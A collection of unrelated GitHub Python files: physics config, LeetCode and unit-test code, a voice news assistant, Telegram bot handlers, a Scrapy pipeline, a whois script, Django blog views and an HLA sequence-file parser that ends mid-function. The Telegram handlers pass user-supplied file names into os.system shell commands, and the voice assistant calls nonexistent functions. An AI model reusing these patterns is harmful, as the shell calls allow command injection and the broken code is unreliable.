vertexReco = cms.PSet(
seccut = cms.double(6.0),
primcut = cms.double(1.8),
smoothing = cms.bool(False),
finder = cms.string('avr'),
minweight = cms.double(0.5),
weightthreshold = cms.double(0.001)
)
)
| cms-sw/cmssw | RecoBTag/SecondaryVertex/python/vertexReco_cff.py | vertexReco_cff.py | py | 286 | python | en | code | 985 | github-code | 50 |
20935076901 | # Definition for singly-linked list.
class ListNode(object):
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution(object):
def mergeKLists(self, lists):
"""
:type lists: List[ListNode]
:rtype: ListNode
"""
if len(lists) == 0:
return None
if len(lists) == 1:
return lists[0]
else:
mid = len(lists) // 2
l1 = self.mergeKLists(lists[0:mid])
l2 = self.mergeKLists(lists[mid:])
head = ListNode(-1, None)
curr_node = head
while l1 is not None or l2 is not None:
if l1 is None:
curr_node.next = l2
break
elif l2 is None:
curr_node.next = l1
break
if l1.val < l2.val:
tmp_node = ListNode(l1.val, None)
l1 = l1.next
else:
tmp_node = ListNode(l2.val, None)
l2 = l2.next
curr_node.next = tmp_node
curr_node = tmp_node
return head.next
| Jason-Woo/leetcode_problemset | Merge k Sorted Lists/code.py | code.py | py | 1,200 | python | en | code | 0 | github-code | 50 |
71027155036 | # -*- coding: utf-8 -*-
"""
Module : B8IT105 - Programming for Big Data
Assignment : CA3 - 10 function sequence calculator
using map, reduce, filter and generator.
Description : Unit tests for the sequence calculator application.
Student Code : 10541255
Student Name : Alyosha Pulle
"""
import unittest
from SequenceCalculator import SequenceCalculator
class TestSequenceCalculator(unittest.TestCase):
def setUp(self):
self.__test_seq1 = [ 9, 20, 4, 11, -7, 18, 13.5 ]
self.__bad_sequence = self.__test_seq1 + ['a']
self.__test_seq2 = [ 21, 15.5, 6.0, -9, -13, 2, 6.5 ]
self.__sequenceCalculator = SequenceCalculator()
def test_min(self):
# Tests the calculator min() function.
self.assertEqual(-7, self.__sequenceCalculator.min(self.__test_seq1))
with self.assertRaises(TypeError):
self.__sequenceCalculator.min(self.__bad_sequence)
def test_max(self):
# Tests the calculator max() function.
self.assertEqual(20, self.__sequenceCalculator.max(self.__test_seq1))
with self.assertRaises(TypeError):
self.__sequenceCalculator.max(self.__bad_sequence)
def test_sum(self):
# Tests the calculator sum() function.
self.assertEqual(68.5, self.__sequenceCalculator.sum(self.__test_seq1))
with self.assertRaises(TypeError):
self.__sequenceCalculator.sum(self.__bad_sequence)
def test_cube(self):
# Tests the calculator cube() function.
result = [729, 8000, 64, 1331, -343, 5832, 2460.375]
self.assertEqual(result,
self.__sequenceCalculator.cube(self.__test_seq1))
with self.assertRaises(TypeError):
self.__sequenceCalculator.cube(self.__bad_sequence)
def test_add(self):
# Tests the calculator add() function.
result = [ 30, 35.5, 10, 2, -20, 20, 20 ]
self.assertEqual(result,
self.__sequenceCalculator.add(self.__test_seq1,
self.__test_seq2))
def test_is_even(self):
# Tests the calculator is_even() function.
result = [ 20, 4, 18 ]
self.assertEqual(result,
list(self.__sequenceCalculator.is_even(self.__test_seq1)))
with self.assertRaises(TypeError):
list(self.__sequenceCalculator.is_even(self.__bad_sequence))
def test_greater_than_mean(self):
# Tests the calculation greater_than_mean() function.
self.assertEqual([ 20, 11, 18, 13.5 ],
list(self.__sequenceCalculator
.greater_than_mean(self.__test_seq1)))
def test_to_fahrenheit(self):
# Tests the calculator to_fahrenheit() function to convert
# celcius to fahrenheit.
seq = [0, 100] + self.__test_seq1
result = [32, 212, 48.2, 68.0, 39.2, 51.8, 19.4, 64.4, 56.3 ]
self.assertEqual(result, self.__sequenceCalculator
.to_fahrenheit(seq))
def test_fibonacci(self):
# Tests the calculator fibonacci series range function.
result = [21, 34, 55, 89]
self.assertEqual(result,
list(self.__sequenceCalculator.fibonacci(20, 100)))
def test_primes(self):
# Tests the calculator fibonacci series range function.
result = [53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
self.assertEqual(result,
list(self.__sequenceCalculator.primes(50, 100)))
self.assertEqual(70,
len(list(self.__sequenceCalculator.primes(0, 350))))
if __name__ == '__main__':
unittest.main()
| alyoshapulledbs/B8IT105 | CA3/TestSequenceCalculatorApp.py | TestSequenceCalculatorApp.py | py | 3,763 | python | en | code | 0 | github-code | 50 |
2665724051 | import webbrowser as wb
import speech_recognition as sr
from time import ctime
import time
import os
from gtts import gTTS
import search_google.api
# the user is asking for their covfefe social media sources here
# we will say clara tell me news about refugees
def facebook(topic):
speak("Hold on "+name+" , I will redirect you to 10 articles.")
wb.open("www.facebook.com")
def locations(topic):
data = data.split(" ")
location = data[2]
speak("Hold on "+name+" , I will show you where the President of the United States just travelled" + location + " today.")
wb.open("https://www.google.com/maps/place/Washington,+DC "+location+" /&")
def search(data,topic):
speak("wait for a while "+name+" ,I will search for you.")
wb.open("https://www.google.co.in/?gfe_rd=cr&ei=V7DXWJuQNarT8gfb-42QBw&gws_rd=ssl#newwindow=1&safe=active&q="+data+"&*")
def speak(audioString):
print(audioString)
tts = gTTS(text=audioString, lang='en')
tts.save("audio.mp3")
os.system("audio.mp3")
def recordAudio():
# Record Audio
r = sr.Recognizer()
r.energy_threshold=500
with sr.Microphone() as source:audio = r.listen(source)
#print("Here is where we speak")
# Speech recognition using Google Speech Recognition with Google Search Speech API
data = ""
try:
# Here I use the default API Key
# To use another API key: `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")`
data = r.recognize_google(audio)
print("You said: " + data)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
return data
with sr.Microphone() as source:
while True:
r = sr.Recognizer()
audio = r.listen(source)
words = sr.recognize(audio)
print("You said " + words)
if words == "Syria":
webbrowser.open('https://www.google.com/search?safe=active&source=hp&ei=jcgjWt7dOs7D_Qak7JGoCw&q=todays+news+on+syria&oq=todays+news+on+syria&gs_l=psy-ab.3..35i39k1j0i22i30k1l9.706.2604.0.2775.21.11.0.0.0.0.320.1221.1j3j0j2.6.0....0...1c.1.64.psy-ab..15.6.1219.0..0j0i10i67k1j0i67k1j0i131k1j0i10k1j0i20i263i264k1j0i20i263k1.0.bPa7KAKkb1M')
elif words =="Syria":
webbrowser.open('https://www.google.co.uk')
elif words == "Stop":
break
def PA(data,topic):
if "what is your name" in data:
speak("I'm Clara.")
if "how are you" in data:
speak("I am fine and you ?")
if "I would like to see news on Syria today" in data:
speak(name)
if "search for news on Syria" in data:
search(data,name)
if "goodbye" in data:
speak("Good bye ! ,"+name+" ,take care!!")
exit()
# initialization
speak("Hello! What type of news would you like to see today?")
topic=input()
speak("Okay I'll try to see if I can find the most factual articles on" +topic+ "today")
while 1:
print("Speak. . .")
data = recordAudio()
print ("Processing. . .")
| tinahaibodi/claraAI | data science/visionex.py | visionex.py | py | 3,141 | python | en | code | 0 | github-code | 50 |
7986839948 | import os
import shutil
from aiogram import Dispatcher, types
from aiogram.dispatcher import FSMContext
from aiogram.types import InputFile
from aiogram.utils import markdown
from utils.bot_init import bot
from utils.checks.curators_check import *
from utils.log import logging
from utils.states import CuratorsChecks
from utils.tables.csv_data import get_curator_words, get_specific_word, enter_audio_data, get_long_audios_names, \
insert_curator_id
from utils.variables import CURATORS_CHAT_ID, MARKERS_NAMES_AND_TIMETABLES, CURATOR_TASKS, \
SUM_PROFILES, TMP_DOWNLOAD_PATH, AVAIL_CURATORS_PROJECTS, AVAIL_AUDIO_PROJECTS_NAMES, AVAIL_AUDIO_TEXT_TYPES, \
YD_DICTORS_PROJECTS_PATH
from utils.yd_dir.yd_download import simple_download
from utils.yd_dir.yd_upload import upload_to_yd
async def project_chosen(message: types.Message, state: FSMContext):
logging(message)
if message.text not in AVAIL_CURATORS_PROJECTS:
await message.answer("Пожалуйста, выберите проект, используя клавиатуру ниже.")
return
await state.update_data(chosen_project=message.text)
await state.set_state(CuratorsChecks.waiting_for_curator_task.state)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
for name in CURATOR_TASKS:
keyboard.add(name)
await message.answer("Выберите задачу", reply_markup=keyboard)
async def curator_task_chosen(message: types.Message, state: FSMContext):
logging(message)
await state.update_data(curator_task=message.text)
if message.text == CURATOR_TASKS[0]:
await state.set_state(CuratorsChecks.waiting_for_num_words.state)
await message.answer("Сколько слов хотите проверить", reply_markup=types.ReplyKeyboardRemove())
elif message.text == CURATOR_TASKS[1]:
await state.set_state(CuratorsChecks.waiting_for_specific_word.state)
await message.answer("Введите необходимое слово", reply_markup=types.ReplyKeyboardRemove())
elif message.text == CURATOR_TASKS[2]:
await state.set_state(CuratorsChecks.waiting_for_word.state)
await message.answer("Введите проверяемое слово (как в таблице)", reply_markup=types.ReplyKeyboardRemove())
else:
await state.set_state(CuratorsChecks.waiting_for_file.state)
await message.answer('Загрузите файлы (поставьте галочку "Группировать"',
reply_markup=types.ReplyKeyboardRemove())
async def curator_num_words_inserted(message: types.Message, state: FSMContext):
curator_id = SUM_PROFILES[str(message.from_user.id)]
user_data = await state.get_data()
project_name = user_data['chosen_project']
try:
arc_path = get_curator_words(message, curator_id, project_name)
arc = InputFile(arc_path)
await message.reply_document(arc)
os.remove(arc_path)
except:
await message.answer("Ошибка выдачи документов", reply_markup=types.ReplyKeyboardRemove())
await state.finish()
async def curator_file_upload(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
file_name = message.document.file_name
download_file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, file_name)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
user_data = await state.get_data()
project_name = user_data['chosen_project']
server_file = await bot.get_file(message.document.file_id)
cmd1 = f'docker cp 10fd0db6c46c:{server_file.file_path} {download_file_path}'
cmd2 = f'docker exec KononovTGServer rm -rf {server_file.file_path}'
os.system(cmd1)
# await message.document.download(destination_file=download_file_path)
out_str = upload_to_yd(project_name, download_file_path, file_name)[0]
await message.answer(out_str, reply_markup=types.ReplyKeyboardRemove())
await state.finish()
os.system(cmd2)
async def word_inserted(message: types.Message, state: FSMContext):
logging(message)
word = message.text
await state.update_data(word=word)
await state.set_state(CuratorsChecks.waiting_for_indexes.state)
await message.answer("Введите результаты проверки в формате \nномер строки - категория ошибки shift+enter")
async def specific_word_inserted(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
user_data = await state.get_data()
project_name = user_data['chosen_project']
try:
file_path = get_specific_word(message, curator_id, project_name)
file = InputFile(file_path)
await message.reply_document(file, reply=False)
os.remove(file_path)
except Exception as e:
logging(message, str(e))
await message.answer("Ошибка выдачи документа", reply_markup=types.ReplyKeyboardRemove())
await state.finish()
async def indexes_inserted(message: types.Message, state: FSMContext):
logging(message)
user_data = await state.get_data()
project_name = user_data['chosen_project']
word = user_data['word']
marker_id, curator_result = enter_curator_data(message, message.text, word, project_name)
await state.finish()
if marker_id:
tg_id = get_tg_user_id(marker_id)
marker_link = markdown.hlink(MARKERS_NAMES_AND_TIMETABLES.get(marker_id)[0], f'tg://user?id={tg_id}')
await bot.send_message(CURATORS_CHAT_ID, f'{marker_link}\n<b>{word}</b>\n{curator_result}',
parse_mode="HTML", disable_web_page_preview=True)
else:
await message.answer(f'Ошибка! \n{curator_result}')
async def dictor_chosen(message: types.Message, state: FSMContext):
logging(message)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
await state.update_data(dictor=message.text)
for name in AVAIL_AUDIO_TEXT_TYPES:
keyboard.add(name)
await message.answer("Выберите тип текста", reply_markup=keyboard)
await state.set_state(CuratorsChecks.waiting_for_text_type.state)
async def text_type_chosen(message: types.Message, state: FSMContext):
logging(message)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
await state.update_data(text_type=message.text)
user_data = await state.get_data()
dictor_name = user_data['dictor']
long_audios_names = get_long_audios_names(dictor_name, message.text)
for name in long_audios_names:
keyboard.add(name)
await message.answer("Выберите нужное аудио", reply_markup=keyboard)
await state.set_state(CuratorsChecks.waiting_for_long_audio.state)
async def long_audio_project_chosen(message: types.Message, state: FSMContext):
logging(message)
user_data = await state.get_data()
dictor_name = user_data['dictor']
text_type = user_data['text_type']
long_audio_name = message.text
rpp_name = long_audio_name.split('/')[-1].replace('wav', 'rpp')
curator_id = SUM_PROFILES[str(message.from_user.id)]
filename = f'{dictor_name}_{text_type}_{rpp_name}'
file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, filename)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
try:
simple_download(f'{YD_DICTORS_PROJECTS_PATH}/{dictor_name}/{text_type}/{rpp_name}', file_path)
except:
rpp_name = rpp_name.replace('.rpp', '.aup3')
simple_download(f'{YD_DICTORS_PROJECTS_PATH}/{dictor_name}/{text_type}/{rpp_name}', file_path)
file1 = InputFile(file_path)
await message.reply_document(file1, reply=False)
os.remove(file_path)
insert_curator_id(long_audio_name, curator_id)
if dictor_name == 'Artem':
try:
flname = f"{text_type}_{long_audio_name.split('/')[-1].replace('wav', 'txt')}"
file2 = InputFile(f'/home/akononov/work_dir/TTS_bot/utils_data/Artem_metki/{flname}')
await message.reply_document(file2, reply=False)
except:
pass
await state.finish()
async def audio_archive_upload(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
file_name = message.document.file_name
download_file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, file_name)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
server_file = await bot.get_file(message.document.file_id)
cmd1 = f'docker cp 10fd0db6c46c:{server_file.file_path} {download_file_path}'
await state.update_data(cmd2=f'docker exec KononovTGServer rm -rf {server_file.file_path}')
await state.update_data(dfp=download_file_path)
os.system(cmd1)
# await message.document.download(destination_file=download_file_path)
await state.set_state(CuratorsChecks.waiting_metki_check_confirm.state)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
for button in ['Подтвердить загрузку', 'Отменить загрузку']:
keyboard.add(button)
await message.answer(check_metki(file_name, download_file_path), reply_markup=keyboard)
async def metki_check_confirm(message: types.Message, state: FSMContext):
user_data = await state.get_data()
cmd2 = user_data['cmd2']
download_file_path = user_data['dfp']
curator_id = SUM_PROFILES[str(message.from_user.id)]
if message.text == 'Подтвердить загрузку':
await message.answer('Загрузка начата...', reply_markup=types.ReplyKeyboardRemove())
out_str = enter_audio_data(message, curator_id, AVAIL_AUDIO_PROJECTS_NAMES[0],
flag='curator', file_path=download_file_path)
try:
await message.answer(out_str, reply_markup=types.ReplyKeyboardRemove())
except:
await message.answer('Файлы загружены', reply_markup=types.ReplyKeyboardRemove())
else:
await message.answer('Загрузка отменена', reply_markup=types.ReplyKeyboardRemove())
os.system(cmd2)
shutil.rmtree(os.path.join(TMP_DOWNLOAD_PATH, curator_id))
await state.finish()
def register_handlers_curators(dp: Dispatcher):
dp.register_message_handler(project_chosen, state=CuratorsChecks.waiting_for_project_name)
dp.register_message_handler(dictor_chosen, state=CuratorsChecks.waiting_for_dictor_name)
dp.register_message_handler(text_type_chosen, state=CuratorsChecks.waiting_for_text_type)
dp.register_message_handler(long_audio_project_chosen, state=CuratorsChecks.waiting_for_long_audio)
dp.register_message_handler(curator_task_chosen, state=CuratorsChecks.waiting_for_curator_task)
dp.register_message_handler(curator_num_words_inserted, state=CuratorsChecks.waiting_for_num_words)
dp.register_message_handler(curator_file_upload, content_types=[types.ContentType.DOCUMENT],
state=CuratorsChecks.waiting_for_file)
dp.register_message_handler(audio_archive_upload, content_types=[types.ContentType.DOCUMENT],
state=CuratorsChecks.waiting_for_archive)
dp.register_message_handler(word_inserted, state=CuratorsChecks.waiting_for_word)
dp.register_message_handler(specific_word_inserted, state=CuratorsChecks.waiting_for_specific_word)
dp.register_message_handler(indexes_inserted, state=CuratorsChecks.waiting_for_indexes)
dp.register_message_handler(metki_check_confirm, state=CuratorsChecks.waiting_metki_check_confirm)
| Theones777/TTS_bot | handlers/curators.py | curators.py | py | 11,806 | python | en | code | 0 | github-code | 50 |
19990773923 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.pipelines.images import ImagesPipeline
import scrapy
import hashlib
# class WeiboPipeline(object):
# def process_item(self, item, spider):
# return item
class WeiboImagesPipeline(ImagesPipeline):
def get_media_requests(self, item, info):
id = item['id']
bid = item['bid']
for img_url in item['pic_urls']:
print(img_url)
yield scrapy.Request(url=img_url, meta={'id': id, 'img_url': img_url, 'bid': bid})
def file_path(self, request, response=None, info=None):
id = request.meta['id']
bid = request.meta['bid']
img_url = request.meta['img_url']
sha1 = hashlib.sha1()
sha1.update(img_url.encode('utf8'))
apath = "./" + str(id) + '/' + str(bid) + '/'
path = apath + sha1.hexdigest() + '.jpg'
return path
def item_completed(self, results, item, info):
print(results)
return item
| wangj98/weibo | weibo/pipelines.py | pipelines.py | py | 1,137 | python | en | code | 0 | github-code | 50 |
27989542722 | #DAY 19 0F 100
#TO FIND IF NUMBER IS PALLINDRONE OR NOT IN PYTHON
#taking input
num =int(input("Enter a number to check if its pallindrone or not: "))
#initialise the value
temp =num
rev = 0
#using while loop
while temp !=0:
digit = rev*10
rev = temp %10 +digit
temp = temp// 10
if num ==rev:
print("The number is pallindrone.")
else:
print("the number is not a pallindrone number.")
| ayushigeorge/python_projects | day19of100.py | day19of100.py | py | 407 | python | en | code | 3 | github-code | 50 |
73696114074 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
import subprocess
import time
"""Takes a textfile with ip-adresses and their frequency as input, performs
whois-request using the Linux-Bash and produces a csv-output showing the
ip-address and the correspondign frequency, the countrycode and the owner
of the ip-address"""
# the file which contains the ip-addresses and number of occurance must be
# specified when calling the script. if not, there is a little error-
# message and the script terminates
try:
inputfile = sys.argv[1]
except:
print("""
Error! You must provide a file as input like this:
python3 whois-helper.py addresses.txt
The script will be terminated now.
""")
sys.exit()
# create and open a file to write the results in
outputfile = open("results.csv", "w")
# declare needed variables for later
countrycode = None
description = None
# writing a headline in the file for the results
outputfile.write("\"frequency\",\"IP-address\",\"countrycode\",\"description\"\n")
with open(inputfile) as source:
for line in source:
line = line.strip()
cc_tmp_list = []
desc_tmp_list = []
# split the frequency and ip-address
pieces = line.split(' ')
# the command to execute
command = subprocess.Popen(['whois', pieces[1]], stdout = subprocess.PIPE)
# print-statement for the user
print("whois-query for:", pieces[1])
# write the number of occurance and the ip-address in the file for the results
outputfile.write("\"{}\",\"{}\",".format(pieces[0], pieces[1]))
# looping through the result of the whois-query
for line in command.stdout:
line = line.strip().decode('UTF-8')
if line.startswith("country:") or line.startswith("Country:"):
parts = line.strip().split(":")
cc_tmp_list.append(parts[1].strip())
if line.startswith("descr:") or line.startswith("OrgName") or line.startswith("owner:"):
parts = line.strip().split(":")
desc_tmp_list.append(parts[1].strip())
# usually there is more than one line matching the current
# pattern, but I want only the first ones
countrycode = cc_tmp_list[0]
description = desc_tmp_list[0]
# write countrycode and description to the file for the results
outputfile.write("\"{}\",\"{}\"\n".format(countrycode, description))
# Setting the variables to "None" again, in case an incorrect ip-address is queried
# otherwise the data of the previous ip-address would be written again
countrycode = None
description = None
# wait for 3 seconds in order not to get blocked - hopefully
time.sleep(3)
# close the file for the results
outputfile.close()
| alex-gehrig/whois-helper | whois-helper.py | whois-helper.py | py | 2,836 | python | en | code | 0 | github-code | 50 |
13719821630 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from .libs.tag_cloud import TagCloud
from .models import Blog, Tag, Category
__author__ = "liuzhijun"
class AboutView(TemplateView):
template_name = 'about.html'
def get_context_data(self, **kwargs):
context = super(AboutView, self).get_context_data(**kwargs)
current_site = Site.objects.get_current()
# 页面信息
context['page'] = dict(comments=True,
path=self.request.path,
title=u'关于',
permalink="".join(["http://", current_site.domain, "/about"]))
return context
class TagsView(ListView):
template_name = 'page.html'
context_object_name = 'tag_list'
model = Tag
def get_context_data(self, **kwargs):
context = super(TagsView, self).get_context_data(**kwargs)
tag_list = context.get("tag_list")
for tag in tag_list:
blog_count = Blog.objects.filter(tags__pk=tag.id).count()
tag.blog_count = blog_count
max_count = min_count = 0
if len(tag_list) > 0:
max_count = max(tag_list, key=lambda tag: tag.blog_count).blog_count
min_count = min(tag_list, key=lambda tag: tag.blog_count).blog_count
tag_cloud = TagCloud(min_count, max_count)
for tag in tag_list:
tag_font_size = tag_cloud.get_tag_font_size(tag.blog_count)
color = tag_cloud.get_tag_color(tag.blog_count)
tag.color = color
tag.font_size = tag_font_size
page = dict()
page['type'] = 'tags'
page['title'] = u"分类"
context['page'] = page
return context
class CategoriesView(ListView):
template_name = "page.html"
context_object_name = "categories"
model = Category
def get_context_data(self, **kwargs):
context = super(CategoriesView, self).get_context_data(**kwargs)
categories = context.get("categories")
for c in categories:
blog_count = Blog.objects.filter(category__pk=c.id).count()
c.blog_count = blog_count
page = dict()
page['type'] = 'categories'
page['title'] = u"标签"
context['page'] = page
return context
class BasePostListView(ListView):
paginate_by = settings.PAGE_SIZE
context_object_name = "posts"
class ArchiveView(BasePostListView):
"""
文章归档
"""
template_name = "archive.html"
def get_queryset(self):
posts = Blog.objects.published().public()
year = None
for post in posts:
if post.publish_time.year != year:
post.year = post.publish_time.year
year = post.year
return posts
class BlogListView(BasePostListView):
"""
首页
"""
template_name = 'index.html'
queryset = Blog.objects.published().public()
class BlogsWithCategoryView(BasePostListView):
"""
指定分类的文章列表
"""
template_name = 'category.html'
def get_queryset(self):
return Blog.objects.published().public().filter(category__id=self.kwargs['pk'])
def get_context_data(self, **kwargs):
context = super(BlogsWithCategoryView, self).get_context_data(**kwargs)
context['page'] = dict(category=self.kwargs['cat_name'], url=self.request.path)
return context
class BlogsWithTagView(BasePostListView):
"""
指定标签下的文章列表
"""
template_name = "tag.html"
def get_queryset(self):
return Blog.objects.published().public().filter(tags__title=self.kwargs['tag_name'])
def get_context_data(self, **kwargs):
context = super(BlogsWithTagView, self).get_context_data(**kwargs)
context['page'] = dict(tag=self.kwargs['tag_name'], url=self.request.path)
return context
class BlogDetailView(DetailView):
"""
文章详情
"""
model = Blog
template_name = "post.html"
context_object_name = "post"
def get_object(self, queryset=None):
blog = super(BlogDetailView, self).get_object(queryset)
if blog.link != self.kwargs['blog_link']:
raise Http404()
if blog.status == 'd' or (not blog.is_public and self.request.user != blog.author):
raise PermissionDenied
# 阅读数增1
blog.access_count += 1
blog.save(modified=False)
return blog
def get_context_data(self, **kwargs):
context = super(BlogDetailView, self).get_context_data(**kwargs)
current_post = context.get("object")
current_site = Site.objects.get_current()
page = dict()
page['comments'] = True
page['title'] = current_post.title
page['permalink'] = "http://" + current_site.domain + current_post.get_absolute_url()
page['path'] = current_post.get_absolute_url
context['page'] = page
next_post = None
prev_post = None
try:
prev_post = Blog.objects.filter(status='p', is_public=True, pk__lt=current_post.id).order_by('-pk')[0]
next_post = Blog.objects.filter(status='p', is_public=True, pk__gt=current_post.id).order_by('pk')[0]
except IndexError:
pass
context['next_post'] = next_post
context['prev_post'] = prev_post
return context
class LatestPosts(Feed):
"""
RSS 输出
"""
from django.utils.feedgenerator import Atom1Feed
feed_type = Atom1Feed
title = "foofish 的笔录"
link = "/"
def items(self):
blogs = Blog.objects.filter(status='p', is_public=True).all().order_by('-publish_time')[:10]
return blogs
def item_title(self, item):
return item.title
def item_description(self, item):
return item.snippet
| lzjun567/django_blog | apps/blog/views.py | views.py | py | 6,195 | python | en | code | 206 | github-code | 50 |
23924691708 | # extract useful information from the dat file
import re
import sys
def readMETA(str) :
# return the seq id, gene seq length, allele type,
# and description
ret = {}
regex = re.compile(r'ID\s{3}(.*); SV \d+; standard; DNA; HUM; (\d+) BP.')
ret1 = regex.search(str)
if ret1 :
ret['ID'] = ret1.group(1)
ret['genelength'] = ret1.group(2)
else:
ret['ID'] = "NA"
ret['genelength'] = "NA"
regex = re.compile(r'DE\s{3}(.*), (.*)\n')
ret2 = regex.search(str)
if ret2 :
ret['allele'] = ret2.group(1)
ret['description'] = ret2.group(2)
else :
ret['allele'] = "NA"
ret['description'] = "NA"
regex1 = re.compile(r'FT\s*UTR')
regex2 = re.compile(r'FT\s*intron')
ret1 = regex1.search(str)
ret2 = regex2.search(str)
if ret1 or ret2 :
ret['seqtype'] = "gene"
else :
ret['seqtype'] = "CDS"
regex = re.compile(r'FT\s*/translation="')
ret2 = regex.search(str)
if ret2 :
ret['type'] = "gene"
else :
ret['type'] = "unkown"
regex = re.compile(r'CC\s*(.*) Release Version (.*)\n')
ret2 = regex.search(str)
if ret2 :
ret['version'] = ret2.group(1)+'-V'+ret2.group(2)
else :
ret['version'] = "NA"
return ret
def readGENE(str) :
# catch CDS intervals
regex1 = re.compile(r'CDS\s*.*codon_start', re.DOTALL)
ret1 = regex1.search(str)
if ret1:
regex2 = re.compile(r'(\d*\.\.\d*)')
ret2 = regex2.findall(ret1.group())
else :
ret2 = None
# catch codon starting position
regex3 = re.compile(r'/codon_start=(\d*)\n')
ret3 = regex3.search(str)
if ret3 :
ret3 = ret3.group(1)
# catch UTR intervals
regex4 = re.compile(r'UTR\s*(\d*\.\.\d*)\n')
ret4 = regex4.findall(str)
# catch exons
regex5 = re.compile(
r'exon\s*(\d*\.\.\d*)\nFT\s*/number="(\d*)"\n(FT\s*/pseudo)?')
#regex5 = re.compile(r'exon\s*(\d*\.\.\d*)\nFT\s*/number="(\d*)"\n')
ret5 = regex5.findall(str)
#print(ret5, file=sys.stderr)
#catch intron
regex6 = re.compile(r'intron\s*(\d*\.\.\d*)\nFT\s*/number="(\d*)"\n')
ret6 = regex6.findall(str)
# catch gene name
regex7 = re.compile(r'/gene="(.*)"\n')
ret7 = regex7.search(str)
if ret7 :
ret7 = ret7.group(1)
else :
ret7 = "NA"
ret = {}
ret['CDS'] = ret2
ret['codon_start'] = ret3
ret['UTR'] = ret4
ret['exon'] = ret5
ret['intron'] = ret6
ret['gene'] = ret7
return ret
def readGENESeq(str) :
ret = {}
regex = re.compile(r'\nSQ.*\n((\s*.*\n)*)//')
ret1 = regex.search(str)
if ret1 :
s = re.sub('\s|\d', '', ret1.group(1)).upper()
ret['geneSeq'] = s
else :
ret['geneSeq'] = "NA"
return ret
def readPROTEIN(str) :
ret = {}
regex = re.compile(r'translation=(.*\n(FT\s{19}.*\n)*)')
ret1 = regex.search(str)
if ret1 :
s = re.sub('FT|"|\n|\s', '', ret1.group(1))
ret['protein'] = s
else :
ret['protein'] = "NA"
#print(s)
return ret
def writeSTDOUTprotein(df) :
s = df['protein']
headline = ">" + df['allele'] + " " + df['ID'] + " " \
+ df['description'].replace(' ', '_') + " " \
+ str(len(s)) + '\n'
sys.stdout.write(headline)
#print('_' + s + '_')
for i in range(len(s) // 60 + 1) :
ostr = s[60 * i : 60 * (i + 1)] + '\n'
sys.stdout.write(ostr)
def writeSTDOUTgeneRecordsFirstline() :
firstline = 'gene' + "\t" + 'ID' + "\t" + 'allele' \
+ "\t" + 'description' + "\t" + 'codon_start' \
+ "\t" + "element" + "\t" + "index" \
+ "\t" + "from\tto" + '\n'
sys.stdout.write(firstline)
def writeSTDOUTgeneRecords(df) :
if df['gene'] and df['ID'] and df['allele'] \
and df['description'] and df['codon_start'] :
pref = df['gene'] + "\t" + df['ID'] + "\t" \
+ df['allele'] + "\t" + df['description'] \
+ "\t" + df['codon_start']
else :
return None
# output gene
ostr = pref + "\t" + "gene" + "\t" + "0" \
+ "\t" + "1\t" + df['genelength'] + '\n'
sys.stdout.write(ostr)
# output CDS
cds = df['CDS']
if cds:
for i in range(len(cds)):
ostr = pref + "\t" + "CDS" + "\t" + str(i+1) \
+ "\t" + cds[i].replace('..', "\t") \
+ '\n'
sys.stdout.write(ostr)
# output UTR
utr = df['UTR']
if utr:
for i in range(len(utr)) :
ostr = pref + "\t" \
+ "UTR" + "\t" + str(i+1) + "\t" \
+ utr[i].replace('..', "\t") + '\n'
sys.stdout.write(ostr)
# output exon
exon = df['exon']
if exon:
for i in range(len(exon)) :
ostr = pref + "\t"\
+ "exon" + "\t" \
+ list(exon[i])[1] + "\t" \
+ list(exon[i])[0].replace('..', "\t") \
+ '\n'
sys.stdout.write(ostr)
def writeSTDOUTgeneElement(df) :
if df['gene'] and df['ID'] and df['allele'] \
and df['description'] and df['codon_start'] :
pref = "gene=" + df['gene'] + "\t" +\
"version=" + df['version'] + "\t" +\
"ID=" + df['ID'] + "\t" +\
"allele=" + df['allele'] + "\t" +\
"description=" + df['description'].replace(' ', '_') + "\t" +\
"type=" + df['type']
else :
return None
ostr = ''
# output gene
ostr = pref + "\t" + "geneRange=" + "1.." + df['genelength']
# output CDS
cds = df['CDS']
if cds:
cdsstr = ",".join(cds)
else :
cdsstr = "NA"
## search for start codon and end codon
cdsArr = []
for x in cds :
a, b = x.split("..")
for y in range(int(a), int(b)+1) : cdsArr.append(y)
cdsArr.sort()
n = len(cdsArr)
shift = int(df['codon_start'])
nCodon = (n - shift + 1)// 3
firstCodon = cdsArr[shift - 1 ]
lastCodon = cdsArr[shift -1 + (nCodon - 1) * 3]
#print([len(cdsArr), firstCodon, lastCodon])
seq = df["geneSeq"]
startCodon = seq[firstCodon-1:firstCodon+2]
stopCodon = seq[lastCodon-1:lastCodon+2]
# for the case that the stop codon is not included in the CDS
if not stopCodon in ["TAA", "TAG", "TGA"] and lastCodon+5 <= len(seq) :
tmp = seq[lastCodon+2:lastCodon+5]
